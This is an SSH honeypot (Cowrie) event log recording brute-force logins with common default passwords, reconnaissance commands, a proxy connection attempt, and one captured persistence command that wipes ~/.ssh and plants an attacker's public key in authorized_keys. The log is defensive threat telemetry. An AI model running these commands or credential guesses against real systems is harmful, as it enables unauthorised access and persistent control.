6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T19:17:35.474431Z","src_ip":"212.227.235.229","session":"15dd1b2cf8ae"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:17:35.949994Z","src_ip":"212.227.235.229","session":"15dd1b2cf8ae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T19:17:36.108705Z","session":"15dd1b2cf8ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34372,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b704ab3ab84","protocol":"ssh","message":"New connection: 212.227.235.229:34372 (1.2.3.4:22) [session: 5b704ab3ab84]","sensor":"my-vps","timestamp":"2025-08-26T19:18:07.521856Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:18:07.523155Z","src_ip":"212.227.235.229","session":"5b704ab3ab84"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:18:07.977995Z","src_ip":"212.227.235.229","session":"5b704ab3ab84"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:18:15.316939Z","src_ip":"212.227.235.229","session":"5b704ab3ab84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59321,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fe3b3a7f291","protocol":"ssh","message":"New connection: 212.227.235.229:59321 (1.2.3.4:22) [session: 7fe3b3a7f291]","sensor":"my-vps","timestamp":"2025-08-26T19:18:25.607032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:18:25.614604Z","src_ip":"212.227.235.229","session":"7fe3b3a7f291"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:18:25.871284Z","src_ip":"212.227.235.229","session":"7fe3b3a7f291"}
{"eventid":"cowrie.login.failed","username":"sysadmin","password":"admin123","message":"login attempt [sysadmin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:18:26.919503Z","src_ip":"212.227.235.229","session":"7fe3b3a7f291"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:18:28.183879Z","src_ip":"212.227.235.229","session":"7fe3b3a7f291"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:18:45.315968Z","src_ip":"212.227.235.229","session":"15dd1b2cf8ae"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":33686,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea7148e08051","protocol":"ssh","message":"New connection: 217.154.1.158:33686 (1.2.3.4:22) [session: ea7148e08051]","sensor":"my-vps","timestamp":"2025-08-26T19:18:50.815517Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:18:50.817396Z","src_ip":"217.154.1.158","session":"ea7148e08051"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:18:50.832219Z","src_ip":"217.154.1.158","session":"ea7148e08051"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:18:50.877536Z","src_ip":"217.154.1.158","session":"ea7148e08051"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:18:50.982411Z","src_ip":"217.154.1.158","session":"ea7148e08051"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:18:50.983481Z","src_ip":"217.154.1.158","session":"ea7148e08051"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:18:51.000314Z","src_ip":"217.154.1.158","session":"ea7148e08051"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:18:51.001806Z","src_ip":"217.154.1.158","session":"ea7148e08051"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50264,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9609877892f","protocol":"ssh","message":"New connection: 212.227.235.229:50264 (1.2.3.4:22) [session: d9609877892f]","sensor":"my-vps","timestamp":"2025-08-26T19:18:57.360209Z"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:18:58.265427Z","src_ip":"212.227.235.229","session":"d9609877892f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59536,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fb9fcae5f09","protocol":"ssh","message":"New connection: 217.72.205.35:59536 (1.2.3.4:22) [session: 0fb9fcae5f09]","sensor":"my-vps","timestamp":"2025-08-26T19:19:05.082235Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:19:05.083388Z","src_ip":"217.72.205.35","session":"0fb9fcae5f09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":20285,"dst_ip":"1.2.3.4","dst_port":22,"session":"14773dbbc8da","protocol":"ssh","message":"New connection: 212.227.125.160:20285 (1.2.3.4:22) [session: 14773dbbc8da]","sensor":"my-vps","timestamp":"2025-08-26T19:19:07.930329Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:19:07.972936Z","src_ip":"212.227.125.160","session":"14773dbbc8da"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":51954,"dst_ip":"1.2.3.4","dst_port":22,"session":"192ba49b5f47","protocol":"ssh","message":"New connection: 217.154.1.158:51954 (1.2.3.4:22) [session: 192ba49b5f47]","sensor":"my-vps","timestamp":"2025-08-26T19:19:07.981009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:19:07.981810Z","src_ip":"217.154.1.158","session":"192ba49b5f47"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:19:07.996843Z","src_ip":"217.154.1.158","session":"192ba49b5f47"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-26T19:19:08.041568Z","src_ip":"217.154.1.158","session":"192ba49b5f47"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:19:08.128108Z","src_ip":"212.227.125.160","session":"14773dbbc8da"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:19:09.069578Z","src_ip":"217.154.1.158","session":"192ba49b5f47"}
{"eventid":"cowrie.login.success","username":"root","password":"Welkom01","message":"login attempt [root/Welkom01] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:19:10.583560Z","src_ip":"212.227.125.160","session":"14773dbbc8da"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:19:11.659765Z","src_ip":"212.227.125.160","session":"14773dbbc8da"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-26T19:19:11.660630Z","src_ip":"212.227.125.160","session":"14773dbbc8da"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:19:12.055959Z","src_ip":"212.227.125.160","session":"14773dbbc8da"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:19:12.230734Z","src_ip":"212.227.125.160","session":"14773dbbc8da"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":43822,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f440ce51573","protocol":"ssh","message":"New connection: 217.154.1.158:43822 (1.2.3.4:22) [session: 8f440ce51573]","sensor":"my-vps","timestamp":"2025-08-26T19:19:25.541906Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:19:25.543022Z","src_ip":"217.154.1.158","session":"8f440ce51573"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:19:25.558051Z","src_ip":"217.154.1.158","session":"8f440ce51573"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive","message":"login attempt [hive/hive] failed","sensor":"my-vps","timestamp":"2025-08-26T19:19:25.607331Z","src_ip":"217.154.1.158","session":"8f440ce51573"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:19:26.623547Z","src_ip":"217.154.1.158","session":"8f440ce51573"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43783,"dst_ip":"1.2.3.4","dst_port":22,"session":"33242251f775","protocol":"ssh","message":"New connection: 212.227.235.229:43783 (1.2.3.4:22) [session: 33242251f775]","sensor":"my-vps","timestamp":"2025-08-26T19:19:39.138692Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:19:39.139675Z","src_ip":"212.227.235.229","session":"33242251f775"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:19:39.415620Z","src_ip":"212.227.235.229","session":"33242251f775"}
{"eventid":"cowrie.login.success","username":"root","password":"asdasd","message":"login attempt [root/asdasd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:19:40.538201Z","src_ip":"212.227.235.229","session":"33242251f775"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:19:41.169780Z","src_ip":"212.227.235.229","session":"33242251f775"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:19:41.170575Z","src_ip":"212.227.235.229","session":"33242251f775"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:19:41.171929Z","src_ip":"212.227.235.229","session":"33242251f775"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:19:41.441306Z","src_ip":"212.227.235.229","session":"33242251f775"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:19:42.053205Z","src_ip":"212.227.235.229","session":"33242251f775"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:19:42.053912Z","src_ip":"212.227.235.229","session":"33242251f775"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:19:42.332719Z","src_ip":"212.227.235.229","session":"33242251f775"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:19:42.333613Z","src_ip":"212.227.235.229","session":"33242251f775"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44512,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5c4670a15c9","protocol":"ssh","message":"New connection: 212.227.235.229:44512 (1.2.3.4:22) [session: c5c4670a15c9]","sensor":"my-vps","timestamp":"2025-08-26T19:19:42.588481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:19:42.597972Z","src_ip":"212.227.235.229","session":"c5c4670a15c9"}
